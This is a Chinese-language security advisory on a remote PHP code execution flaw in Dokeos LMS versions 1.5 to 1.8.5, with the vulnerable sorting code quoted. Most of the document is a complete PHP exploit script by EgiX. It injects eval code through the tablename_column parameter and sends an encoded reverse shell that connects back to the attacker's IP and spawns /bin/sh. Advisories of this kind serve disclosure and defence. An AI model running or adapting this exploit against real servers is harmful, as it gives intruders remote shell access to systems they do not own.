安全研究
安全漏洞
Dokeos whoisonline.php远程PHP代码执行漏洞
发布日期:2009-04-21
更新日期:2009-04-23
受影响系统:
Dokeos e-learning Dokeos 1.5.* - 1.8.5描述:
BUGTRAQ ID: 34633
Dokeos是一个开源网上教育与课程管理系统。
Dokeos没有过滤对whoisonline.php中tablename_column参数所传送的输入便在main/inc/lib/tablesort.lib.php的create_function()调用中使用,远程攻击者可以通过提交恶意请求导致注入并执行任意PHP代码。以下是/main/inc/lib/tablesort.lib.php中的有漏洞代码段:
86. function sort_table($data, $column = 0, $direction = SORT_ASC, $type = SORT_REGULAR)
87. {
88. if(!is_array($data) or count($data)==0){return array();}
89. switch ($type)
90. {
91. case SORT_REGULAR :
92. if (TableSort::is_image_column($data, $column))
93. {
94. return TableSort::sort_table($data, $column, $direction, SORT_IMAGE);
95. }
96. elseif (TableSort::is_date_column($data, $column))
97. {
98. return TableSort::sort_table($data, $column, $direction, SORT_DATE);
99. }
100. elseif (TableSort::is_numeric_column($data, $column))
101. {
102. return TableSort::sort_table($data, $column, $direction, SORT_NUMERIC);
103. }
104. return TableSort::sort_table($data, $column, $direction, SORT_STRING);
105. break;
106. case SORT_NUMERIC :
107. $compare_function = 'strip_tags($el1) > strip_tags($el2)';
108. break;
109. case SORT_STRING :
110. $compare_function = 'strnatcmp(TableSort::orderingstring(strip_tags($el1)), [...]
111. break;
112. case SORT_IMAGE :
113. $compare_function = 'strnatcmp(TableSort::orderingstring(strip_tags($el1,"<img>")), [...]
114. break;
115. case SORT_DATE :
116. $compare_function = 'strtotime(strip_tags($el1)) > strtotime(strip_tags($el2))';
117. }
118. $function_body = '$el1 = $a['.$column.']; $el2 = $b['.$column.']; return ('.$direction.' == SORT_ASC [...]
119. // Sort the content
120. usort($data, create_function('$a,$b', $function_body));
121. return $data;
122. }
<*来源:EgiX (n0b0d13s@gmail.com)
链接:http://secunia.com/advisories/34855/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
if (socket_connect($s, $host, 80) == false)
die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
socket_write($s, $packet, strlen($packet));
while ($m = socket_read($s, 2048)) $response .= $m;
socket_close($s);
return $response;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Dokeos LMS <= 1.8.5 (reverse shell) Code Injection Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n\n";
if ($argc < 4)
{
print "\nUsage......: php $argv[0] <host> <path> <local IP> [port]\n";
print "\nExample....: php $argv[0] localhost /dokeos/ 192.168.0.2";
print "\nExample....: php $argv[0] localhost / 192.168.0.2 12345\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$ip = $argv[3];
$port = isset($argv[4]) ? (int)$argv[4] : 4444;
// reverse shell based on http://pentestmonkey.net/tools/php-reverse-shell/
$code =
"c2V0X3RpbWVfbGltaXQoMCk7CmluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA1KTsKC" .
"iRpcCA9ICRfU0VSVkVSW0hUVFBfSVBdOwokcG9ydCA9ICRfU0VSVkVSW0hUVFBfUE9SVF07CiRjaH" .
"Vua19zaXplID0gMjA0ODsKCmlmICghKCRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQpKSkgZGl" .
"lKCdbZXJyXUNvbm5lY3Rpb24gdG8geyRpcH06eyRwb3J0fSByZWZ1c2VkJyk7CiRkZXNjcmlwdG9y" .
"c3BlYyA9IGFycmF5KDAgPT4gYXJyYXkoJ3BpcGUnLCAncicpLCAxID0+IGFycmF5KCdwaXBlJywgJ" .
"3cnKSwgMiA9PiBhcnJheSgncGlwZScsICd3JykpOwppZiAoIWlzX3Jlc291cmNlKCgkcHJvY2Vzcy" .
"A9IHByb2Nfb3BlbignL2Jpbi9zaCAtaScsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKSkpKSBkaWU" .
"oJ1tlcnJdQ2FuXCd0IHNwYXduIHNoZWxsJyk7CgpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sw" .
"XSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsKc3RyZWFtX3NldF9ibG9ja" .
"2luZygkcGlwZXNbMl0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsKCndoaWxlIC" .
"ghZmVvZigkc29jaykgJiYgIWZlb2YoJHBpcGVzWzFdKSkgewoJJHJlYWRfYSA9IGFycmF5KCRzb2N" .
"rLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CgkkbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9z" .
"ZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsKCglpZiAoaW5fYXJyYXkoJ" .
"HNvY2ssICRyZWFkX2EpKSB7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQ" .
"lmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJ" .
"lYWRfYSkpIHsKCQkkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsKCQlmd3Jp" .
"dGUoJHNvY2ssICRpbnB1dCk7Cgl9CglpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkge" .
"woJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOwoJCWZ3cml0ZSgkc29jay" .
"wgJGlucHV0KTsKCX0KfQoKZmNsb3NlKCRzb2NrKTsKZmNsb3NlKCRwaXBlc1swXSk7CmZjbG9zZSg" .
"kcGlwZXNbMV0pOwpmY2xvc2UoJHBpcGVzWzJdKTsKcHJvY19jbG9zZSgkcHJvY2Vzcyk7CmRpZTsK";
$packet = "GET {$path}whoisonline.php?tablename_column=0];}eval(base64_decode(\$_SERVER[HTTP_CODE]));%23 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Code: {$code}\r\n";
$packet .= "IP: {$ip}\r\n";
$packet .= "Port: {$port}\r\n";
$packet .= "Connection: close\r\n\r\n";
$response = http_send($host, $packet);
if (preg_match("/\[err\](.*)/", $response, $match)) die("[-] Exploit failed ({$match[1]})\n");
if (preg_match("/<\/html>/", $response)) die("[-] Exploit failed (No users online)\n");
?>
建议:
厂商补丁:
Dokeos e-learning
-----------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dokeos.com/
浏览次数:3719
严重程度:0(网友投票)
绿盟科技给您安全的保障